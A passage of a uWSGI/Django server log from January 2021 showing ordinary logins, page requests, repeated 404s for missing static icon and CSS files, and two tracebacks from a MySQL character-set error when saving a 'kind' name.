bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 246/323] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 247/324] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 248/325] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 249/326] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 250/327] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 251/328] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 252/329] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 07:51:19 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 253/330] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 07:51:19 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 255/331] 219.228.146.156 () {40 vars in 937 bytes} [Thu Jan 14 07:51:29 2021] GET /announcement/? => generated 8247 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 255/332] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 07:51:29 2021] POST /announcement/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 256/333] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 07:51:29 2021] GET /announcement/ => generated 8247 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 257/334] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 258/335] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 259/336] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 260/337] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 261/338] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 262/339] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 263/340] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 264/341] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:51:29 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 265/342] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 07:51:29 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 266/343] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:51:53 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/344] 219.228.146.156 () {40 vars in 865 bytes} [Thu Jan 14 07:51:53 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/345] 219.228.146.156 () {40 vars in 887 bytes} [Thu Jan 14 07:51:53 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/346] 219.228.146.156 () {40 vars in 869 bytes} [Thu Jan 14 07:51:53 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/347] 219.228.146.156 () {40 vars in 867 bytes} [Thu Jan 14 07:51:53 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/348] 219.228.146.156 () {40 vars in 873 bytes} [Thu Jan 14 07:51:53 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/349] 219.228.146.156 () {40 vars in 848 bytes} [Thu Jan 14 07:51:53 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/350] 219.228.146.156 () {40 vars in 846 bytes} [Thu Jan 14 07:51:53 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/351] 219.228.146.156 () {40 vars in 864 bytes} [Thu Jan 14 07:51:54 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/352] 219.228.146.156 () {40 vars in 862 bytes} [Thu Jan 14 07:51:54 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/353] 219.228.146.156 () {40 vars in 854 bytes} [Thu Jan 14 07:51:54 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/354] 219.228.146.156 () {40 vars in 908 bytes} [Thu Jan 14 07:51:54 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: 0|req: 267/355] 219.228.146.156 () {40 vars in 921 bytes} [Thu Jan 14 07:51:56 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 268/356] 219.228.146.156 () {40 vars in 918 bytes} [Thu Jan 14 07:51:59 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 269/357] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:52:08 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 270/358] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 07:52:09 2021] GET /home/ => generated 7944 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 271/359] 219.228.146.146 () {42 vars in 934 bytes} [Thu Jan 14 07:52:40 2021] GET /kind-manage/ => generated 8286 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 272/360] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 273/361] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 274/362] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 275/363] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 276/364] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 277/365] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:52:40 2021] GET /static/css/spinners.css => generated 3516 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 278/366] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 279/367] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 280/368] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:52:40 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 281/369] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:52:49 2021] GET /kind-manage/? => generated 8286 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 282/370] 219.228.146.146 () {48 vars in 987 bytes} [Thu Jan 14 07:52:49 2021] POST /kind-manage/ => generated 206956 bytes in 153 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 283/371] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 284/372] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 285/373] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 287/374] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 288/375] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 288/376] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 28 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 289/377] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:52:50 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 290/378] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 291/379] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:52:50 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 2069|app: 0|req: 292/380] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:52:58 2021] GET / => generated 3429 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 293/381] 219.228.146.146 () {42 vars in 936 bytes} [Thu Jan 14 07:53:00 2021] GET /kind-manage/? => generated 8286 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 294/382] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 295/383] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 296/384] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 297/385] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 298/386] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 299/387] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 300/388] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 301/389] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:53:00 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 302/390] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:53:00 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 303/391] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:53:02 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 304/392] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:53:13 2021] POST /login/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 305/393] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 07:53:13 2021] GET /home/ => generated 7944 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 307/394] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:53:23 2021] GET /kind-manage/? => generated 8286 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File 